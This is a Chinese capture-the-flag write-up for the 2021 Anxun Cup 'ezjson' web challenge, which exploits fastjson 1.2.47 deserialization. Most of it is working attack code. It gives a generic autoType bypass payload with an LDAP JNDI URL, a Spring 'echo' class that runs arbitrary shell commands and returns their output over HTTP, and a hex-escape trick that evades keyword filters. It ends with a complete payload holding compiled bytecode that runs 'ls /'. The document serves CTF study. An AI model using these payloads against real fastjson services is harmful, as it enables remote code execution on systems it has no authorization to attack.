2021安洵杯ezjson-wp

  1. 1. ezjson

ezjson

比赛只做了前两道web,这道题没去看了,因为当时看做出来的人不多就去复习了,今天有空看一下题。

fd文件可以泄露 jar文件下到源码。题目环境不出网没法jndi。但题目本身留了加载字节码后门。

1638412580898.png

1638415811131.png

fastjson版本1.2.47,有个通杀payload

1
2
3
4
5
6
7
8
9
10
11
{
"a":{
"@type":"java.lang.Class",
"val":"com.sun.rowset.JdbcRowSetImpl"
},
"b":{
"@type":"com.sun.rowset.JdbcRowSetImpl",
"dataSourceName":"ldap://localhost:1389/badNameClass",
"autoCommit":true
}
}

这里调用到App.Exec的getFlag即可,

这里可以用$ref调用任意的get

https://paper.seebug.org/1613/#ref

为了回显,字节码用老熟人spring通用回显

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
package echo;

import com.sun.org.apache.xalan.internal.xsltc.DOM;
import com.sun.org.apache.xalan.internal.xsltc.TransletException;
import com.sun.org.apache.xalan.internal.xsltc.runtime.AbstractTranslet;
import com.sun.org.apache.xml.internal.dtm.DTMAxisIterator;
import com.sun.org.apache.xml.internal.serializer.SerializationHandler;
import org.apache.catalina.connector.Response;
import org.apache.catalina.connector.ResponseFacade;
import org.apache.catalina.core.ApplicationFilterChain;

import javax.servlet.ServletRequest;
import javax.servlet.ServletResponse;
import java.io.IOException;
import java.io.InputStream;
import java.lang.reflect.Field;
import java.lang.reflect.Method;
import java.lang.reflect.Modifier;
import java.util.Scanner;

public class SpringEcho {
public static void Exec(String cmd) {
try {
Class c = Thread.currentThread().getContextClassLoader().loadClass("org.springframework.web.context.request.RequestContextHolder");
Method m = c.getMethod("getRequestAttributes");
Object o = m.invoke(null);
c = Thread.currentThread().getContextClassLoader().loadClass("org.springframework.web.context.request.ServletRequestAttributes");
m = c.getMethod("getResponse");
Method m1 = c.getMethod("getRequest");
Object resp = m.invoke(o);
Object req = m1.invoke(o); // HttpServletRequest
Method getWriter = Thread.currentThread().getContextClassLoader().loadClass("javax.servlet.ServletResponse").getDeclaredMethod("getWriter");
Method getHeader = Thread.currentThread().getContextClassLoader().loadClass("javax.servlet.http.HttpServletRequest").getDeclaredMethod("getHeader", String.class);
getHeader.setAccessible(true);
getWriter.setAccessible(true);
Object writer = getWriter.invoke(resp);

String[] commands = new String[3];
String charsetName = System.getProperty("os.name").toLowerCase().contains("window") ? "GBK" : "UTF-8";
if (System.getProperty("os.name").toUpperCase().contains("WIN")) {
commands[0] = "cmd";
commands[1] = "/c";
} else {
commands[0] = "/bin/sh";
commands[1] = "-c";
}
commands[2] = cmd;
writer.getClass().getDeclaredMethod("println", String.class).invoke(writer, new Scanner(Runtime.getRuntime().exec(commands).getInputStream(), charsetName).useDelimiter("\\A").next());
writer.getClass().getDeclaredMethod("flush").invoke(writer);
writer.getClass().getDeclaredMethod("close").invoke(writer);
}
catch (Exception e){

}

}
}

这里还要绕关键字

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
package BOOT-INF.classes.App;

import com.alibaba.fastjson.JSON;
import java.util.regex.Pattern;
import javax.servlet.http.HttpServletRequest;
import javax.servlet.http.HttpServletResponse;
import org.springframework.stereotype.Controller;
import org.springframework.web.bind.annotation.RequestMapping;
import org.springframework.web.bind.annotation.ResponseBody;

@Controller
public class JsonController {
@ResponseBody
@RequestMapping({"/json"})
public String hello(HttpServletRequest request, HttpServletResponse response) {
String Poc = request.getParameter("Poc");
if (Poc != null) {
String pattern = ".*Exec.*|.*cmd.*";
boolean isMatch = Pattern.matches(pattern, Poc);
if (isMatch)
return "No way!!!";
JSON.parse(Poc);
return Poc;
}
return "readme";
}
}

fastjson有个特性,遇到\x和\u就会解码,所以十六进制绕过

exp

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
package anxun;

import java.util.Locale;
import javassist.ClassPool;


public class exp {
public static String bytesToHexString(byte[] src){
StringBuilder stringBuilder = new StringBuilder("");
if (src == null || src.length <= 0) {
return null;
}
for (int i = 0; i < src.length; i++) {
int v = src[i] & 0xFF;
String hv = Integer.toHexString(v);
if (hv.length() < 2) {
stringBuilder.append(0);
}
stringBuilder.append(hv);
}
return stringBuilder.toString();
}
public static void main(String[] args) throws Exception{
// byte[] bytes = ClassPool.getDefault().get("echo.payload").toBytecode();
byte[] bytes = ClassPool.getDefault().get("echo.SpringEcho").toBytecode();
String code = bytesToHexString(bytes).toUpperCase(Locale.ROOT);
System.out.println("{\n" +
" \"a\": {\n" +
" \"@type\": \"java.lang.Class\",\n" +
" \"val\":\"App.\\x45\\x78\\x65\\x63\"\n" +
" },\n" +
" \"b\": {\n" +
" \"@type\":\"App.\\x45\\x78\\x65\\x63\",\n" +
" \"ClassByte\":x\'"+code+"\',\n" +
" \"\\x63\\x6d\\x64\": \"ls\",\n" +
" \"flag\": {\"$ref\":\"$.b.flag\"}\n"+
" }\n" +
"}");
}
}

1
2
3
4
5
6
7
8
9
10
11
12
Poc={
"a": {
"@type": "java.lang.Class",
"val":"App.\x45\x78\x65\x63"
},
"b": {
"@type":"App.\x45\x78\x65\x63",
"ClassByte":x'CAFEBABE0000003400AC0A000900540A005500560A005500570800580A0059005A08005B07005C0A0007005D07005E0A005F00600800610800620800630800640800420A000700650800660800430700670A005F00680800690A006A006B0A0013006C08006D0A0013006E08006F0800700A001300710800720800490800730800740800750A000900760800770700780A0079007A0A0079007B0A007C007D0A0024007E08007F0A002400800A002400810800820800830700840700850100063C696E69743E010003282956010004436F646501000F4C696E654E756D6265725461626C650100124C6F63616C5661726961626C655461626C65010004746869730100114C6563686F2F537072696E674563686F3B01000445786563010015284C6A6176612F6C616E672F537472696E673B2956010001630100114C6A6176612F6C616E672F436C6173733B0100016D01001A4C6A6176612F6C616E672F7265666C6563742F4D6574686F643B0100016F0100124C6A6176612F6C616E672F4F626A6563743B0100026D3101000472657370010003726571010009676574577269746572010009676574486561646572010006777269746572010008636F6D6D616E64730100135B4C6A6176612F6C616E672F537472696E673B01000B636861727365744E616D650100124C6A6176612F6C616E672F537472696E673B010003636D6401000D537461636B4D61705461626C6507006707005C07008607005E0700460700840100104D6574686F64506172616D657465727301000A536F7572636546696C6501000F537072696E674563686F2E6A6176610C003000310700870C008800890C008A008B01003C6F72672E737072696E676672616D65776F726B2E7765622E636F6E746578742E726571756573742E52657175657374436F6E74657874486F6C64657207008C0C008D008E010014676574526571756573744174747269627574657301000F6A6176612F6C616E672F436C6173730C008F00900100106A6176612F6C616E672F4F626A6563740700860C009100920100406F72672E737072696E676672616D65776F726B2E7765622E636F6E746578742E726571756573742E536572766C6574526571756573744174747269627574657301000B676574526573706F6E736501000A6765745265717565737401001D6A617661782E736572766C65742E536572766C6574526573706F6E73650C009300900100256A617661782E736572766C65742E687474702E48747470536572766C6574526571756573740100106A6176612F6C616E672F537472696E670C009400950100076F732E6E616D650700960C009700980C0099009A01000677696E646F770C009B009C01000347424B0100055554462D380C009D009A01000357494E0100022F630100072F62696E2F73680100022D630C009E009F0100077072696E746C6E0100116A6176612F7574696C2F5363616E6E65720700A00C00A100A20C00A300A40700A50C00A600A70C003000A80100025C410C00A900AA0C00AB009A010005666C757368010005636C6F73650100136A6176612F6C616E672F457863657074696F6E01000F6563686F2F537072696E674563686F0100186A6176612F6C616E672F7265666C6563742F4D6574686F640100106A6176612F6C616E672F54687265616401000D63757272656E7454687265616401001428294C6A6176612F6C616E672F5468726561643B010015676574436F6E74657874436C6173734C6F6164657201001928294C6A6176612F6C616E672F436C6173734C6F616465723B0100156A6176612F6C616E672F436C6173734C6F616465720100096C6F6164436C617373010025284C6A6176612F6C616E672F537472696E673B294C6A6176612F6C616E672F436C6173733B0100096765744D6574686F64010040284C6A6176612F6C616E672F537472696E673B5B4C6A6176612F6C616E672F436C6173733B294C6A6176612F6C616E672F7265666C6563742F4D6574686F643B010006696E766F6B65010039284C6A6176612F6C616E672F4F626A6563743B5B4C6A6176612F6C616E672F4F626A6563743B294C6A6176612F6C616E672F4F626A6563743B0100116765744465636C617265644D6574686F6401000D73657441636365737369626C65010004285A29560100106A6176612F6C616E672F53797374656D01000B67657450726F7065727479010026284C6A6176612F6C616E672F537472696E673B294C6A6176612F6C616E672F537472696E673B01000B746F4C6F7765724361736501001428294C6A6176612F6C616E672F537472696E673B010008636F6E7461696E7301001B284C6A6176612F6C616E672F4368617253657175656E63653B295A01000B746F557070657243617365010008676574436C61737301001328294C6A6176612F6C616E672F436C6173733B0100116A6176612F6C616E672F52756E74696D6501000A67657452756E74696D6501001528294C6A6176612F6C616E672F52756E74696D653B01000465786563010028285B4C6A6176612F6C616E672F537472696E673B294C6A6176612F6C616E672F50726F636573733B0100116A6176612F6C616E672F50726F6365737301000E676574496E70757453747265616D01001728294C6A6176612F696F2F496E70757453747265616D3B01002A284C6A6176612F696F2F496E70757453747265616D3B4C6A6176612F6C616E672F537472696E673B295601000C75736544656C696D69746572010027284C6A6176612F6C616E672F537472696E673B294C6A6176612F7574696C2F5363616E6E65723B0100046E6578740021002F0009000000000002000100300031000100320000002F00010001000000052AB70001B10000000200330000000600010000001500340000000C00010000000500350036000000090037003800020032000002B60009000C00000165B80002B600031204B600054C2B120603BD0007B600084D2C0103BD0009B6000A4EB80002B60003120BB600054C2B120C03BD0007B600084D2B120D03BD0007B600083A042C2D03BD0009B6000A3A0519042D03BD0009B6000A3A06B80002B60003120EB60005120F03BD0007B600103A07B80002B600031211B60005121204BD00075903121353B600103A08190804B60014190704B600141907190503BD0009B6000A3A0906BD00133A0A1215B80016B600171218B60019990008121AA70005121B3A0B1215B80016B6001C121DB60019990012190A03121E53190A04121F53A7000F190A03122053190A04122153190A052A531909B60022122304BD00075903121353B60010190904BD00095903BB002459B80025190AB60026B60027190BB700281229B6002AB6002B53B6000A571909B60022122C03BD0007B60010190903BD0009B6000A571909B60022122D03BD0007B60010190903BD0009B6000A57A700044CB10001000001600163002E000300330000006E001B00000018000C00190017001A0021001B002D001C0038001D0044001E004F001F005B002000710021008C0022009200230098002400A5002600AB002700C4002800D4002900DA002A00E3002C00E9002D00EF002F00F40030013000310148003201600036016300340164003800340000007A000C000C01540039003A000100170149003B003C00020021013F003D003E00030044011C003F003C0004004F01110040003E0005005B01050041003E0006007100EF0042003C0007008C00D40043003C000800A500BB0044003E000900AB00B500450046000A00C4009C00470048000B00000165004900480000004A000000430006FF00C0000B07004B07004C07004D07004E07004D07004E07004E07004D07004D07004E07004F00004107004BFC002007004B0BFF0073000107004B000107005000005100000005010049000000010052000000020053',
"\x63\x6d\x64": "ls /",
"flag": {"$ref":"$.b.flag"}
}
}

1638418846329.png

s